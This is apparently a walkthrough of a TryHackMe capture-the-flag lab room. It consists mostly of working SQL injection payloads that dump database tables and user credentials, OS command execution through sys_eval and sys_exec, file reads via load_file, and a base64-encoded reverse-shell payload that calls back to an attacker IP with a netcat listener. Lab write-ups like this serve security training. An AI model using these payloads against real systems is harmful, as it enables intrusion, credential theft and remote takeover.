TryHack3M: Sch3Ma D3Mon

Room Link: https://tryhackme.com/r/room/sch3mad3mon

A Public Computer with a VPN

goto Edit -> preferences -> protocols -> search for SSL or TLS -> select the ssl-key.log file and hit enter to decrypt the web traffic.

Filter

http contains "Username"

Connected Tables

Filter

' union select 1,2,3,4,5 -- //

Find Databse

Filter

' union select 1,2,3,4,database() -- //

Find Tables

Filter

' union select 1,2,3,4,group_concat(table_name) from information_schema.tables WHERE table_schema = 'mayh3Mmarketplace'; -- //

Get fields

Filter

' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name='users' -- //

Get field info

Confirmed we're the only other user.

Filter

' union select 1,group_concat(username),group_concat(password),3,4 FROM users -- -

Filter

' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name='unlisted_products' -- //

Filter

' union select null,null,null,null, group_concat(product_name) from unlisted_products -- //

From DB to OS

URL

http://10.10.26.7:8000/os_sqli.php?user=lannister' union SELECT null, null, null, null, sys_eval('whoami') -- //

URL

http://10.10.26.7:8000/os_sqli.php?user=lannister%27%20union%20SELECT%20null,%20null,%20null,%20null,%20sys_eval(%27pwd%27)%20--%20//

Finding a Needle in a Malwarestack

We can see the files but if we cat them they get cut off.

URL

http://10.10.61.64:8000/os_sqli.php?user=lannister%27%20union%20SELECT%20null,%20null,%20null,%20null,%20sys_eval(%27ls%20%20/home/receipts%27)%20--%20//

URL

' union select null,null,null,column_name,null from information_schema.columns where table_name='transactions' -- // 

URL

' union select null,null,null,null,group_concat(transaction_number, '::', bcoin_sender_address, '::', bcoin_recipient_address,'\n') from transactions -- //

URL

' union select null,null,null,sys_exec('touch /var/lib/mysql/my_file.txt'),null -- //
' union select null,null,null,sys_eval('ls -al /home/receipts/ > /var/lib/mysql/my_file.txt'),null -- //
' union select null,null,null,load_file('/var/lib/mysql/my_file.txt'),null -- // verify that our command able to load the file

' union select null,null,null,load_file('/home/receipts/3000000.txt.gpg'),null -- //

If you use Burp the output will be nicer to copy over.

Kali

gpg --decrypt 3000000.txt.gpg
Passphrase: eqFN5vBg4n2t4xGsJF7BYNWMtTaVA1muES

Operation Defang

Kali

nc -lvnp 9001

URL

http://10.10.61.64:8000/os_sqli.php?user=lannister%27%20union%20SELECT%20null,%20null,%20null,%20null,%20sys_eval(%27echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2MS4xNDEvOTAwMSAwPiYx%20|%20base64%20-d%20%20|/bin/bash%27)%20--%20//

Victim

script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fg

Victim

cd /home/products/malware/4sale/pal4t1n3/MisterMeist3r/2DC6C0
ls 

After reading the code I saw that we can defang the code just by changing the config.ini file fto debug=true so we can run the code without having to worry about what will happen.

Victim

echo "debug=true" > config.ini  
./build.sh